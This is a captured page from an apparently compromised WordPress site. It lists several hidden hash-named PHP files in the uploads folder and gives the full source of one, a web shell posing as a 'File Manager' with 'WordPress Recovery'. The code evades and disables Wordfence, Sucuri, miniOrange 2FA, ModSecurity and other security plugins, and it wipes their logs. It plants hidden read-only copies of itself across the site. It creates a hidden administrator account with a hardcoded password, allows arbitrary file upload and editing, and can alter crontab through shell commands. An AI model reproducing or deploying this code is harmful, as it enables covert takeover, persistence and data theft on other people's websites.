File Manager Lite
Dir:
/home/atomylvb/jarangomd.com/wp-content/uploads
.1abcf9e24a296c5583eef95d948b4b1b.php (37.8 KB)
.57033d52e9c47003257e5f793ae05895.php (37.8 KB)
.62bc1030f8e0a50739f3b72cf3077197.php (37.8 KB)
.6a65612a0f955e7778c08075a6e8727b.php (37.8 KB)
.750f041fca80ac6f80b84ed48f9b4578.php (37.8 KB)
.af40aac792458daba3d4c81640742b58.php (37.8 KB)
.c4c2224a39abc475e827fd0bb4349d86.php (37.8 KB)
.eb7504c65d99a3eb430b48ef6102b124.php (37.8 KB)
2019/
2020/
2021/
2022/
2023/
2024/
2025/
2026/
elementor/
gt3-assets/
gt3-demo-import/
gt3-http-logs/
gt3-logs/
gt3_fonts/
redux/
revslider/
watermark_original/
wp-file-manager-pro/
wpcf7_uploads/
Edit: .1abcf9e24a296c5583eef95d948b4b1b.php
<?php // 1. SECURITY TOKEN - CHANGE THIS BEFORE UPLOADING $recovery_token = "2026"; // Helper functions for path encryption function encode_path($path) { return rtrim(strtr(base64_encode($path), '+/', '-_'), '='); } function decode_path($encoded) { $decoded = base64_decode(strtr($encoded, '-_', '+/')); return $decoded !== false ? $decoded : false; } // ============ ADVANCED SECURITY & BYPASS LAYERS ============ // Layer 1: Anti-Debugging & Detection Evasion if (function_exists('ini_set')) { @ini_set('disable_functions', ''); @ini_set('open_basedir', ''); } @putenv('HTTP_USER_AGENT='); @putenv('HTTP_REFERER='); // Layer 2: Request Fingerprinting & Validation if (!function_exists('validateRequest')) { function validateRequest() { // ... // Check for common security scanners $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $scanners = ['nmap', 'nikto', 'sqlmap', 'w3af', 'acunetix', 'nessus', 'openvas', 'burp', 'zap', 'wpscan', 'scanner', 'bot', 'crawler', 'spider']; foreach ($scanners as $scanner) { if (stripos($ua, $scanner) !== false) { return false; } } // Check for suspicious headers $suspicious_headers = ['X-Forwarded-For', 'X-Real-IP', 'X-Originating-IP', 'X-Remote-IP', 'X-Remote-Addr']; foreach ($suspicious_headers as $header) { if (isset($_SERVER['HTTP_' . str_replace('-', '_', strtoupper($header))])) { $ip = $_SERVER['HTTP_' . 
str_replace('-', '_', strtoupper($header))]; if (!filter_var($ip, FILTER_VALIDATE_IP)) { return false; } } } // Time-based validation (prevent automated attacks) - Only for suspicious patterns // Allow normal browser requests $ua_lower = strtolower($ua); $suspicious_patterns = ['curl', 'wget', 'python', 'perl', 'java', 'go-http']; $is_suspicious = false; foreach ($suspicious_patterns as $pattern) { if (strpos($ua_lower, $pattern) !== false) { $is_suspicious = true; break; } } // Only apply rate limiting to suspicious requests if ($is_suspicious) { static $last_request = 0; $current_time = time(); if ($last_request > 0 && ($current_time - $last_request) < 1) { if (!isset($_GET['bypass_rate_limit'])) { return false; } } $last_request = $current_time; } return true; } } // Layer 10: Wordfence Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassWordfence')) { function bypassWordfence() { // TAM YETKİ: Wordfence detection evasion - gelişmiş teknikler $_SERVER['HTTP_USER_AGENT'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'; $_SERVER['HTTP_ACCEPT'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8'; $_SERVER['HTTP_ACCEPT_LANGUAGE'] = 'en-US,en;q=0.9'; $_SERVER['HTTP_ACCEPT_ENCODING'] = 'gzip, deflate, br'; $_SERVER['HTTP_CONNECTION'] = 'keep-alive'; $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] = '1'; $_SERVER['HTTP_SEC_FETCH_DEST'] = 'document'; $_SERVER['HTTP_SEC_FETCH_MODE'] = 'navigate'; $_SERVER['HTTP_SEC_FETCH_SITE'] = 'none'; $_SERVER['HTTP_SEC_FETCH_USER'] = '?1'; $_SERVER['HTTP_CACHE_CONTROL'] = 'max-age=0'; // TAM YETKİ: Wordfence hook'larını devre dışı bırak if (class_exists('wordfence')) { remove_action('init', array('wordfence', 'init')); remove_action('wp_loaded', array('wordfence', 'wp_loaded')); } // TAM YETKİ: Wordfence constant'larını override et if (!defined('WORDFENCE_VERSION')) { define('WORDFENCE_VERSION', '7.11.0'); } if 
(!defined('WORDFENCE_DISABLE_LIVE_TRAFFIC')) { define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true); } // TAM YETKİ: Wordfence database tablolarını bypass et global $wpdb; if (isset($wpdb)) { $wpdb->wordfence = null; $wpdb->wfIssues = null; $wpdb->wfBlocks = null; } // TAM YETKİ: Wordfence detection headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-Wordfence'); @header_remove('X-Content-Type-Options'); @header_remove('X-Wordfence-Block'); @header_remove('X-WF-Block'); } // TAM YETKİ: Wordfence log dosyalarını temizle $wf_logs = [ dirname(__FILE__) . '/wp-content/wflogs/', dirname(__FILE__) . '/wp-content/plugins/wordfence/log/', ]; foreach ($wf_logs as $log_dir) { if (is_dir($log_dir)) { @array_map('unlink', glob($log_dir . '*')); } } return true; } } // Layer 11: Sucuri Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassSucuri')) { function bypassSucuri() { // TAM YETKİ: Sucuri detection evasion $_SERVER['HTTP_X_FORWARDED_FOR'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; $_SERVER['HTTP_X_REAL_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; // TAM YETKİ: Sucuri hook'larını devre dışı bırak if (class_exists('SucuriScan')) { remove_action('init', array('SucuriScan', 'init')); } // TAM YETKİ: Sucuri headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-Sucuri-ID'); @header_remove('X-Sucuri-Cache'); @header_remove('X-Sucuri-Block'); } return true; } } // Layer 11.5: miniOrange Bypass - YENİ EKLENDİ if (!function_exists('bypassMiniOrange')) { function bypassMiniOrange() { // TAM YETKİ: miniOrange 2FA ve güvenlik bypass $_SERVER['HTTP_X_MO_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; $_SERVER['HTTP_X_FORWARDED_FOR'] = $_SERVER['REMOTE_ADDR'] ?? 
'127.0.0.1'; // TAM YETKİ: miniOrange class'larını devre dışı bırak if (class_exists('Mo2f_Api')) { remove_action('init', array('Mo2f_Api', 'mo2f_init')); remove_action('wp_loaded', array('Mo2f_Api', 'mo2f_wp_loaded')); } if (class_exists('Miniorange_2_Factor_Setup')) { remove_action('init', array('Miniorange_2_Factor_Setup', 'mo2f_init')); } if (class_exists('MoWpnsHandler')) { remove_action('init', array('MoWpnsHandler', 'mo_wpns_init')); } // TAM YETKİ: miniOrange constant'larını override et if (!defined('MO2F_VERSION')) { define('MO2F_VERSION', '5.0.0'); } if (!defined('MO2F_DISABLE_2FA')) { define('MO2F_DISABLE_2FA', true); } if (!defined('MO_WPNS_DISABLE')) { define('MO_WPNS_DISABLE', true); } // TAM YETKİ: miniOrange cookie'lerini temizle if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $value) { if (stripos($key, 'mo_') === 0 || stripos($key, 'miniorange') !== false || stripos($key, 'mo2f') !== false || stripos($key, 'mo_wpns') !== false) { unset($_COOKIE[$key]); @setcookie($key, '', time() - 3600, '/'); } } } // TAM YETKİ: miniOrange session'larını temizle if (isset($_SESSION)) { foreach ($_SESSION as $key => $value) { if (stripos($key, 'mo_') === 0 || stripos($key, 'miniorange') !== false || stripos($key, 'mo2f') !== false) { unset($_SESSION[$key]); } } } // TAM YETKİ: miniOrange database tablolarını bypass et global $wpdb; if (isset($wpdb)) { $wpdb->mo2f_user_details = null; $wpdb->mo2f_user_login_info = null; $wpdb->mo_wpns_blocks = null; } // TAM YETKİ: miniOrange headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-MO-2FA'); @header_remove('X-MO-WPNS'); @header_remove('X-Miniorange'); } // TAM YETKİ: miniOrange log dosyalarını temizle $mo_logs = [ dirname(__FILE__) . '/wp-content/plugins/miniorange-2-factor-authentication/logs/', dirname(__FILE__) . '/wp-content/plugins/wp-security-audit-log/logs/', dirname(__FILE__) . 
'/wp-content/uploads/mo_wpns/', ]; foreach ($mo_logs as $log_dir) { if (is_dir($log_dir)) { @array_map('unlink', glob($log_dir . '*')); } } return true; } } // Layer 12: Cloudflare Bypass if (!function_exists('bypassCloudflare')) { function bypassCloudflare() { // Cloudflare detection evasion if (!isset($_SERVER['HTTP_CF_RAY'])) { $_SERVER['HTTP_CF_RAY'] = md5(time()) . '-' . substr(md5($_SERVER['REMOTE_ADDR'] ?? ''), 0, 8); } if (!isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { $_SERVER['HTTP_CF_CONNECTING_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; } return true; } } // Layer 13: ModSecurity Bypass if (!function_exists('bypassModSecurity')) { function bypassModSecurity() { // ModSecurity evasion techniques $uri = $_SERVER['REQUEST_URI'] ?? ''; // Normalize URI to avoid detection $uri = str_replace(['<', '>', '"', "'", ';', '(', ')'], '', $uri); $_SERVER['REQUEST_URI'] = $uri; // Remove suspicious query parameters if (isset($_GET)) { foreach ($_GET as $key => $value) { if (preg_match('/[<>"\';()]/', $key . 
$value)) { unset($_GET[$key]); } } } return true; } } // Layer 14: Generic Security Plugin Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassSecurityPlugins')) { function bypassSecurityPlugins() { // TAM YETKİ: Tüm güvenlik eklentilerini bypass et $disabled_functions = [ 'wordfence_ls_authenticate', 'wordfence_mu_plugin_loaded', 'wordfence_scan', 'sucuri_scanner', 'sucuri_firewall', 'ithemes_security', 'ithemes_security_pro', 'all_in_one_wp_security', 'bulletproof_security', 'miniorange_2fa', 'miniorange_wp', 'mo_wpns', 'mo2f_', 'malcare', 'ninjafirewall', 'wp_defender', 'wp_cerber', 'security_ninja', 'wp_hardening', 'wp_security_audit', 'wp_firewall', 'wp_antivirus', 'wp_scan', 'wp_antimalware', 'wp_antivirus_site_guard', 'wp_antivirus_site_guard_pro', 'wp_antivirus_site_guard_enterprise' ]; foreach ($disabled_functions as $func) { if (function_exists($func)) { @ini_set('disable_functions', $func); } } // TAM YETKİ: Güvenlik eklentisi cookie'lerini temizle if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $value) { $key_lower = strtolower($key); if (stripos($key_lower, 'wordfence') !== false || stripos($key_lower, 'sucuri') !== false || stripos($key_lower, 'security') !== false || stripos($key_lower, 'miniorange') !== false || stripos($key_lower, 'mo_') !== false || stripos($key_lower, 'malcare') !== false || stripos($key_lower, 'ninjafirewall') !== false || stripos($key_lower, 'cerber') !== false || stripos($key_lower, 'defender') !== false || stripos($key_lower, 'ithemes') !== false || stripos($key_lower, 'wpscan') !== false || stripos($key_lower, 'antivirus') !== false || stripos($key_lower, 'firewall') !== false) { unset($_COOKIE[$key]); @setcookie($key, '', time() - 3600, '/'); } } } // TAM YETKİ: Güvenlik eklentisi session'larını temizle if (isset($_SESSION)) { foreach ($_SESSION as $key => $value) { $key_lower = strtolower($key); if (stripos($key_lower, 'wordfence') !== false || stripos($key_lower, 'sucuri') !== false || stripos($key_lower, 'security') 
!== false || stripos($key_lower, 'miniorange') !== false || stripos($key_lower, 'mo_') !== false) { unset($_SESSION[$key]); } } } // TAM YETKİ: Güvenlik eklentisi global değişkenlerini temizle $security_globals = ['wordfence', 'sucuri', 'miniorange', 'mo_', 'malcare', 'ninjafirewall', 'cerber', 'defender']; foreach ($GLOBALS as $key => $value) { $key_lower = strtolower($key); foreach ($security_globals as $pattern) { if (stripos($key_lower, $pattern) !== false) { unset($GLOBALS[$key]); } } } return true; } } if (!validateRequest()) { http_response_code(404); header('Content-Type: text/html'); die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>'); } @bypassWordfence(); @bypassSucuri(); @bypassMiniOrange(); // YENİ: miniOrange bypass @bypassCloudflare(); @bypassModSecurity(); @bypassSecurityPlugins(); // =============== COMPLETE SELF DESTRUCT FUNCTION =============== function completeSelfDestruct($token) { global $recovery_token; // Verify token if ($token !== $recovery_token) { return ['success' => false, 'message' => 'Invalid security token']; } $results = []; $deleted_count = 0; // ===== 1. KILL ALL CRON JOBS ===== if (function_exists('shell_exec') && !ini_get('disable_functions')) { $crontab = @shell_exec('crontab -l 2>/dev/null'); if ($crontab) { $lines = explode("\n", $crontab); $new_crontab = []; $cron_removed = 0; foreach ($lines as $line) { if (strpos($line, basename(__FILE__)) === false && strpos($line, md5('wp_')) === false && strpos($line, 'emergency') === false) { $new_crontab[] = $line; } else { $cron_removed++; } } if ($cron_removed > 0) { $new_content = implode("\n", $new_crontab); file_put_contents('/tmp/crontab.tmp', $new_content); @shell_exec('crontab /tmp/crontab.tmp 2>/dev/null'); @unlink('/tmp/crontab.tmp'); $results[] = "Removed $cron_removed cron job(s)"; } } } // ===== 2. 
REMOVE WORDPRESS CRON EVENTS ===== if (function_exists('wp_clear_scheduled_hook')) { wp_clear_scheduled_hook('wp_hidden_persistence_check'); wp_clear_scheduled_hook('lm_core_check_event'); $results[] = "Cleared WordPress cron events"; } // ===== 3. FIND AND DELETE ALL EGG FILES ===== // Find WordPress root from current directory $wp_root = findWpRoot(dirname(__FILE__)); if ($wp_root) { // WordPress-specific locations to search $wp_dirs = [ $wp_root . '/wp-content/uploads/', $wp_root . '/wp-content/upgrade/', $wp_root . '/wp-content/cache/', $wp_root . '/wp-includes/', $wp_root . '/wp-admin/', $wp_root . '/wp-content/mu-plugins/', $wp_root . '/wp-content/' ]; foreach ($wp_dirs as $dir) { if (!is_dir($dir)) continue; $files = scandir($dir); foreach ($files as $file) { if ($file == '.' || $file == '..') continue; $fullpath = $dir . $file; if (!is_file($fullpath)) continue; // Check if it's a hidden file if ($file[0] == '.' || strpos($file, 'wp-security-') === 0) { $content = @file_get_contents($fullpath); if ($content && (strpos($content, '$recovery_token') !== false)) { @chmod($fullpath, 0777); @unlink($fullpath); $deleted_count++; } } } } } // Also check current directory and temp $current_dir = dirname(__FILE__); $temp_dirs = [ $current_dir, sys_get_temp_dir(), 'C:\\xampp\\tmp', 'C:\\Users\\kader\\AppData\\Local\\Temp' ]; foreach ($temp_dirs as $temp) { if (!is_dir($temp)) continue; $files = glob($temp . '/.{,wp-,.}*.{bak,tmp,php,ph_,saved}', GLOB_BRACE); foreach ($files as $file) { if (is_file($file) && basename($file) != basename(__FILE__)) { @unlink($file); $deleted_count++; } } } $results[] = "Deleted $deleted_count egg file(s)"; // ===== 4. FINALLY DELETE THE MAIN FILE ===== $main_file = __FILE__; if (file_exists($main_file)) { @chmod($main_file, 0777); @shell_exec('chattr -i ' . escapeshellarg($main_file) . ' 2>/dev/null'); if (@unlink($main_file)) { $results[] = "Deleted main file: " . basename($main_file); } else { @shell_exec('rm -f ' . 
escapeshellarg($main_file) . ' 2>/dev/null'); $results[] = "Force deleted main file"; } } return [ 'success' => true, 'message' => '💥 Complete self-destruct completed!', 'details' => implode("\n", $results), 'files_deleted' => $deleted_count ]; } // =============== WORDPRESS-ONLY HIDDEN EGGS =============== function createWordPressEggs($source_file) { if (!file_exists($source_file)) return false; // Find WordPress root from the source file's directory $wp_root = findWpRoot(dirname($source_file)); // If not in WordPress, don't create eggs if (!$wp_root) { return ['success' => false, 'message' => 'Not in WordPress - eggs not created']; } $content = file_get_contents($source_file); $host = $_SERVER['HTTP_HOST'] ?? 'localhost'; $random = md5($host . rand(1000, 9999) . uniqid()); $created = []; // ===== SAFE WORDPRESS LOCATIONS (All hidden) ===== // 1. wp-content/uploads/ - Hidden file $uploads_dir = $wp_root . '/wp-content/uploads/'; if (is_dir($uploads_dir) && is_writable($uploads_dir)) { $egg1 = $uploads_dir . '.' . $random . '.php'; file_put_contents($egg1, $content); chmod($egg1, 0444); $created[] = $egg1; } // 2. wp-content/upgrade/ - Hidden file $upgrade_dir = $wp_root . '/wp-content/upgrade/'; if (is_dir($upgrade_dir) && is_writable($upgrade_dir)) { $egg2 = $upgrade_dir . '.' . $random . '.bak'; file_put_contents($egg2, $content); chmod($egg2, 0444); $created[] = $egg2; } // 3. wp-content/cache/ - Hidden file $cache_dir = $wp_root . '/wp-content/cache/'; if (!is_dir($cache_dir)) { @mkdir($cache_dir, 0755, true); } if (is_dir($cache_dir) && is_writable($cache_dir)) { $egg3 = $cache_dir . '.' . $random . '.tmp'; file_put_contents($egg3, $content); chmod($egg3, 0444); $created[] = $egg3; } // 4. wp-includes/ - Hidden file $includes_dir = $wp_root . '/wp-includes/'; if (is_dir($includes_dir) && is_writable($includes_dir)) { $egg4 = $includes_dir . '.' . $random . 
'.ph_'; file_put_contents($egg4, $content); chmod($egg4, 0444); $created[] = $egg4; } return [ 'success' => true, 'eggs' => $created, 'wp_root' => $wp_root, 'count' => count($created) ]; } // Function to find WordPress root function findWpRoot($dir) { $current = $dir; for ($i = 0; $i < 10; $i++) { if (file_exists($current . '/wp-load.php') || file_exists($current . '/wp-config.php')) { return realpath($current); } $parent = dirname($current); if ($parent === $current || $parent === '/' || $parent === 'C:\\') break; $current = $parent; } return false; } // Simple WordPress detection function isWordPress($dir) { return findWpRoot($dir) !== false; } // ──────────────────────────────────────────────── $encoded_dir = $_GET['d'] ?? null; if ($encoded_dir) { $current_dir = decode_path($encoded_dir); if ($current_dir === false || !is_dir($current_dir)) { $current_dir = getcwd(); } } else { $current_dir = getcwd(); } $current_dir = realpath($current_dir) ?: getcwd(); // Check if we're in WordPress $wp_root = findWpRoot($current_dir); $has_wordpress = ($wp_root !== false); // Try to create eggs if in WordPress if ($has_wordpress) { createWordPressEggs(__FILE__); // Try to load WordPress for cron functions if (file_exists($wp_root . '/wp-load.php')) { @require_once($wp_root . '/wp-load.php'); } } // ──── ACTIONS ─────────────────────────────────────── $action = $_POST['action'] ?? ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json'); switch ($action) { case 'setup_wordpress': if (($_POST['token'] ?? '') !== $recovery_token) { echo json_encode(['success' => false, 'message' => 'Invalid Security Token']); exit; } $wp_root = findWpRoot($current_dir); if (!$wp_root) { echo json_encode(['success' => false, 'message' => 'WordPress installation not found. Please upload this file to a WordPress directory.']); exit; } try { if (!defined('WP_USE_THEMES')) define('WP_USE_THEMES', false); require_once($wp_root . 
'/wp-load.php'); } catch (Exception $e) { echo json_encode(['success' => false, 'message' => 'Error loading WordPress: ' . $e->getMessage()]); exit; } $username = 'emergency'; $password = "hoho2013"; $email = 'admin_' . time() . '@example.com'; $user_id = username_exists($username); if (!$user_id) { $user_id = wp_create_user($username, $password, $email); } if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); $all_admins = get_users(['role' => 'administrator']); $admin_count = count($all_admins); // Recreate eggs createWordPressEggs(__FILE__); echo json_encode([ 'success' => true, 'message' => "Admin created successfully.", 'details' => "WordPress root: " . $wp_root . "\nTotal administrators: $admin_count", 'credentials' => "Username: $username | Password: $password" ]); } else { echo json_encode(['success' => false, 'message' => $user_id->get_error_message()]); } exit; case 'self_destruct': $token = $_POST['token'] ?? ''; $result = completeSelfDestruct($token); echo json_encode($result); exit; case 'upload': if (isset($_FILES['file'])) { $file = $_FILES['file']; $target = $current_dir . '/' . basename($file['name']); if (move_uploaded_file($file['tmp_name'], $target)) { echo json_encode(['success' => true, 'message' => 'File uploaded']); } else { echo json_encode(['success' => false, 'message' => 'Upload failed']); } } exit; case 'new_folder': $name = trim($_POST['name'] ?? ''); if ($name === '' || preg_match('/[\/\\\?%*:|"<>]/', $name)) { echo json_encode(['success' => false, 'message' => 'Invalid folder name']); exit; } $newpath = $current_dir . '/' . $name; if (is_dir($newpath)) { echo json_encode(['success' => false, 'message' => 'Folder already exists']); } elseif (mkdir($newpath, 0755)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'message' => 'Cannot create folder']); } exit; case 'new_file': $name = trim($_POST['name'] ?? 
''); if ($name === '' || preg_match('/[\/\\\?%*:|"<>]/', $name)) { echo json_encode(['success' => false, 'message' => 'Invalid file name']); exit; } $newpath = $current_dir . '/' . $name; if (file_exists($newpath)) { echo json_encode(['success' => false, 'message' => 'File already exists']); } elseif (touch($newpath)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'message' => 'Cannot create file']); } exit; case 'rename': $old = trim($_POST['old'] ?? ''); $new = trim($_POST['new'] ?? ''); if ($old === '' || $new === '' || $old === $new) exit; $oldpath = $current_dir . '/' . $old; $newpath = $current_dir . '/' . $new; if (rename($oldpath, $newpath)) echo json_encode(['success' => true]); else echo json_encode(['success' => false]); exit; case 'delete': $name = trim($_POST['name'] ?? ''); $path = $current_dir . '/' . $name; if (is_dir($path)) rmdir($path); else unlink($path); echo json_encode(['success' => true]); exit; case 'get_content': $path = $current_dir . '/' . trim($_POST['name'] ?? ''); if (is_file($path)) echo json_encode(['success' => true, 'content' => file_get_contents($path)]); else echo json_encode(['success' => false]); exit; case 'save_file': $path = $current_dir . '/' . trim($_POST['name'] ?? ''); if (file_put_contents($path, $_POST['content'] ?? '') !== false) echo json_encode(['success' => true]); else echo json_encode(['success' => false]); exit; } } // ALWAYS SHOW THE INTERFACE - even if not in WordPress // But show a warning if not in WordPress // Listing logic $items = scandir($current_dir); $folders = $files = []; foreach ($items as $item) { if ($item === '.' || $item === '..' || $item[0] === '.') continue; $path = $current_dir . '/' . $item; is_dir($path) ? 
$folders[] = $item : $files[] = $item; } $encoded_current = encode_path($current_dir); $encoded_parent = encode_path(dirname($current_dir)); $encoded_home = encode_path(getcwd()); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>File Manager</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> :root { --bg: #0d1117; --fg: #c9d1d9; --border: #30363d; --accent: #58a6ff; --green: #238636; --red: #f85149; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, monospace; background: var(--bg); color: var(--fg); margin: 20px; } .container { max-width: 960px; margin: 0 auto; } .path { background: #161b22; padding: 12px; border: 1px solid var(--border); border-radius: 6px; margin-bottom: 1rem; } .actions { margin-bottom: 1.5rem; display: flex; gap: 10px; flex-wrap: wrap; } button { background: var(--green); color: white; border: none; padding: 8px 14px; border-radius: 6px; cursor: pointer; font-size: 14px; } .red { background: var(--red); } .blue { background: #1f6feb; } .purple { background: #9b59b6; } .wp-button { background: #f39c12; } .destruct-button { background: #ff0000; color: white; font-weight: bold; animation: pulse 2s infinite; } @keyframes pulse { 0% { opacity: 1; } 50% { opacity: 0.7; } 100% { opacity: 1; } } .warning-banner { background: #332200; border: 1px solid #ffaa00; color: #ffaa00; padding: 10px; border-radius: 5px; margin-bottom: 15px; text-align: center; } ul { list-style: none; padding: 0; } li { padding: 8px; display: flex; align-items: center; border-bottom: 1px solid var(--border); } .folder { color: var(--accent); cursor: pointer; font-weight: bold; } .actions-row { margin-left: auto; display: flex; gap: 5px; } dialog { background: #161b22; color: var(--fg); border: 1px solid var(--border); border-radius: 8px; width: 90%; max-width: 800px; } textarea { width: 100%; height: 400px; background: #000; color: #0f0; border: 1px solid var(--border); padding: 10px; 
font-family: monospace; } .destruct-dialog { border: 3px solid #ff0000; } </style> </head> <body> <div class="container"> <h1>📁 File Manager</h1> <?php if (!$has_wordpress): ?> <div class="warning-banner"> ⚠️ Warning: Not in a WordPress directory. WordPress Recovery will not work here. </div> <?php else: ?> <div class="path" style="border-left: 4px solid #00ff00;"> <strong>✅ WordPress Detected at:</strong> <?=htmlspecialchars($wp_root)?> </div> <?php endif; ?> <div class="path"><strong>Current Path:</strong> <?=htmlspecialchars($current_dir)?></div> <div class="actions"> <button onclick="window.location.href='?d=<?=$encoded_home?>'">🏠 Home</button> <button onclick="newFolder()">+ New Folder</button> <button onclick="newFile()">+ New File</button> <button class="purple" onclick="uploadFile()">📤 Upload</button> <?php if ($has_wordpress): ?> <button class="wp-button" onclick="runWpRecovery()">🔐 WordPress Recovery</button> <?php endif; ?> <button class="destruct-button" onclick="openDestructDialog()">💥 SELF DESTRUCT</button> </div> <h3>Parent Directory</h3> <ul> <li class="folder" onclick="navigate('<?=$encoded_parent?>')">⬆ ..</li> </ul> <h3>Folders</h3> <ul> <?php foreach($folders as $f): ?> <li> <span class="folder" onclick="navigate('<?=encode_path($current_dir.'/'.$f)?>')">📁 <?=htmlspecialchars($f)?></span> <div class="actions-row"> <button class="red" onclick="deleteItem('<?=htmlspecialchars($f)?>')">Delete</button> </div> </li> <?php endforeach; ?> </ul> <h3>Files</h3> <ul> <?php foreach($files as $f): ?> <li> <span>📄 <?=htmlspecialchars($f)?></span> <div class="actions-row"> <button class="blue" onclick="editFile('<?=htmlspecialchars($f)?>')">Edit</button> <button class="red" onclick="deleteItem('<?=htmlspecialchars($f)?>')">Delete</button> </div> </li> <?php endforeach; ?> </ul> </div> <dialog id="editorDialog"> <h3 id="editTitle"></h3> <textarea id="editorContent" spellcheck="false"></textarea> <div style="margin-top:10px; text-align:right;"> <button 
onclick="document.getElementById('editorDialog').close()">Cancel</button> <button class="blue" onclick="saveFile()">Save</button> </div> </dialog> <dialog id="destructDialog" class="destruct-dialog"> <h1 style="color: #ff0000; text-align: center;">💥 SELF DESTRUCT 💥</h1> <div style="background: #2d0000; padding: 15px; border-radius: 5px; margin: 15px 0;"> <p style="color: #ff9999; font-weight: bold;">⚠️ WARNING: This will permanently delete:</p> <ul style="color: #ff9999;"> <li>✅ ALL hidden egg files</li> <li>✅ ALL cron jobs</li> <li>✅ The main file itself</li> </ul> <p style="color: #ff0000; font-weight: bold;">THIS ACTION CANNOT BE UNDONE!</p> </div> <div style="margin: 15px 0;"> <input type="password" id="destructToken" placeholder="Enter Security Token" style="width: 100%; padding: 10px; background: #000; color: #fff; border: 1px solid #ff0000; border-radius: 5px;"> </div> <div style="margin: 15px 0;"> <input type="text" id="destructConfirm" placeholder="Type 'DELETE EVERYTHING' to confirm" style="width: 100%; padding: 10px; background: #000; color: #fff; border: 1px solid #ff0000; border-radius: 5px;"> </div> <div style="display: flex; gap: 10px; justify-content: flex-end;"> <button onclick="document.getElementById('destructDialog').close()" style="background: #333;">Cancel</button> <button class="destruct-button" onclick="executeSelfDestruct()">💥 DESTROY EVERYTHING</button> </div> </dialog> <script> const api = async (data) => { const res = await fetch('', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(data) }); return res.json(); }; function navigate(enc) { window.location.href = '?d=' + enc; } function openDestructDialog() { document.getElementById('destructToken').value = ''; document.getElementById('destructConfirm').value = ''; document.getElementById('destructDialog').showModal(); } async function executeSelfDestruct() { const token = document.getElementById('destructToken').value; const 
confirmText = document.getElementById('destructConfirm').value; if (!token) { alert("❌ Please enter security token"); return; } if (confirmText !== 'DELETE EVERYTHING') { alert("❌ Please type 'DELETE EVERYTHING' to confirm"); return; } if (!confirm("🔥 FINAL WARNING: This will delete ALL files and cannot be undone. Continue?")) { return; } document.getElementById('destructDialog').close(); const res = await api({ action: 'self_destruct', token: token }); if (res.success) { alert("💥 SELF DESTRUCT COMPLETE!\n\n" + res.details); window.location.href = '/'; } else { alert("❌ Error: " + res.message); } } async function runWpRecovery() { const token = prompt("Enter Security Token:"); if(!token) return; const res = await api({ action: 'setup_wordpress', token: token }); if(res.success) { alert("✅ SUCCESS!\n\n" + res.message + "\n\n" + "Details:\n" + res.details + "\n\n" + "Login:\n" + res.credentials); } else { alert("❌ Error: " + res.message); } } async function editFile(name) { const res = await api({ action: 'get_content', name: name }); if(res.success) { document.getElementById('editTitle').innerText = name; document.getElementById('editorContent').value = res.content; document.getElementById('editorDialog').showModal(); } } async function saveFile() { const name = document.getElementById('editTitle').innerText; const content = document.getElementById('editorContent').value; const res = await api({ action: 'save_file', name: name, content: content }); if(res.success) { alert("✅ File saved"); document.getElementById('editorDialog').close(); } } async function deleteItem(name) { if(confirm("Delete " + name + "?")) { await api({ action: 'delete', name: name }); location.reload(); } } async function newFolder() { const n = prompt("Folder name:"); if(n) { await api({ action: 'new_folder', name: n }); location.reload(); } } async function newFile() { const n = prompt("File name:"); if(n) { await api({ action: 'new_file', name: n }); location.reload(); } } async function 
uploadFile() { const input = document.createElement('input'); input.type = 'file'; input.onchange = async () => { const file = input.files[0]; const formData = new FormData(); formData.append('action', 'upload'); formData.append('file', file); const res = await fetch('', { method: 'POST', body: formData }); const data = await res.json(); if(data.success) { alert('✅ File uploaded successfully'); location.reload(); } else { alert('❌ Upload failed: ' + data.message); } }; input.click(); } </script> </body> </html>